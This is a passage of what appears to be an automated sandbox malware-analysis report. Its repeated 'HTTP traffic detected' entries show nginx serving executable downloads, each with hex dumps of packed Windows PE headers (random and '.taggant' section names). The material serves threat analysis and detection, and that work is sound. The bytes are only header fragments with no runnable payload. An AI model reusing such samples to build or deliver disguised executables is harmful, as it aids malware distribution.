00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 ec 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ec 4c 01 00 00 40 0d 00 00 4e 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 90 0e 00 00 76 00 00 00 42 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 10:04:17 GMTContent-Type: application/octet-streamContent-Length: 2786816Last-Modified: Mon, 16 Dec 2024 09:28:02 GMTConnection: keep-aliveETag: "675ff2a2-2a8600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 58 b2 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 74 7a 7a 7a 74 6d 6c 71 00 40 2a 00 00 a0 00 00 00 24 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 78 6c 61 69 73 74 7a 00 20 00 00 00 e0 2a 00 00 06 00 00 00 5e 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2b 00 00 22 00 00 00 64 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 10:04:28 GMTContent-Type: application/octet-streamContent-Length: 1834496Last-Modified: Sat, 14 Dec 2024 21:12:38 GMTConnection: keep-aliveETag: "675df4c6-1bfe00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 62 fe 59 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 cc 03 00 00 b0 00 00 00 00 00 00 00 80 48 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 48 00 00 04 00 00 e2 b0 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 48 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 20 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 40 05 00 00 02 00 00 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 62 76 6d 78 6b 6f 62 00 80 19 00 00 f0 2e 00 00 7a 19 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 64 61 77 61 6c 6d 68 00 10 00 00 00 70 48 00 00 04 00 00 00 d8 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 48 00 00 22 00 00 00 dc 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 10:04:28 GMTContent-Type: application/octet-streamContent-Length: 2786816Last-Modified: Mon, 16 Dec 2024 09:28:04 GMTConnection: keep-aliveETag: "675ff2a4-2a8600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 58 b2 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 74 7a 7a 7a 74 6d 6c 71 00 40 2a 00 00 a0 00 00 00 24 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 78 6c 61 69 73 74 7a 00 20 00 00 00 e0 2a 00 00 06 00 00 00 5e 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2b 00 00 22 00 00 00 64 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 10:04:40 GMTContent-Type: application/octet-streamContent-Length: 1854976Last-Modified: Mon, 16 Dec 2024 09:29:36 GMTConnection: keep-aliveETag: "675ff300-1c4e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 30 6b 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 6b 00 00 04 00 00 82 2e 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 2b 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 6c 6d 73 65 63 74 69 00 b0 1a 00 00 70 50 00 00 a8 1a 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 63 67 64 64 62 6d 76 00 10 00 00 00 20 6b 00 00 06 00 00 00 26 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 6b 00 00 22 00 00 00 2c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 10:04:42 GMTContent-Type: application/octet-streamContent-Length: 2786816Last-Modified: Mon, 16 Dec 2024 09:28:04 GMTConnection: keep-aliveETag: "675ff2a4-2a8600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 58 b2 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 74 7a 7a 7a 74 6d 6c 71 00 40 2a 00 00 a0 00 00 00 24 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 78 6c 61 69 73 74 7a 00 20 00 00 00 e0 2a 00 00 06 00 00 00 5e 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2b 00 00 22 00 00 00 64 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 10:04:48 GMTContent-Type: application/octet-streamContent-Length: 1854976Last-Modified: Mon, 16 Dec 2024 09:29:36 GMTConnection: keep-aliveETag: "675ff300-1c4e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 30 6b 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 6b 00 00 04 00 00 82 2e 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 2b 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 6c 6d 73 65 63 74 69 00 b0 1a 00 00 70 50 00 00 a8 1a 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 63 67 64 64 62 6d 76 00 10 00 00 00 20 6b 00 00 06 00 00 00 26 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 6b 00 00 22 00 00 00 2c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 10:04:52 GMTContent-Type: application/octet-streamContent-Length: 2786816Last-Modified: Mon, 16 Dec 2024 09:28:04 GMTConnection: keep-aliveETag: "675ff2a4-2a8600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 58 b2 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 74 7a 7a 7a 74 6d 6c 71 00 40 2a 00 00 a0 00 00 00 24 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 78 6c 61 69 73 74 7a 00 20 00 00 00 e0 2a 00 00 06 00 00 00 5e 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2b 00 00 22 00 00 00 64 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 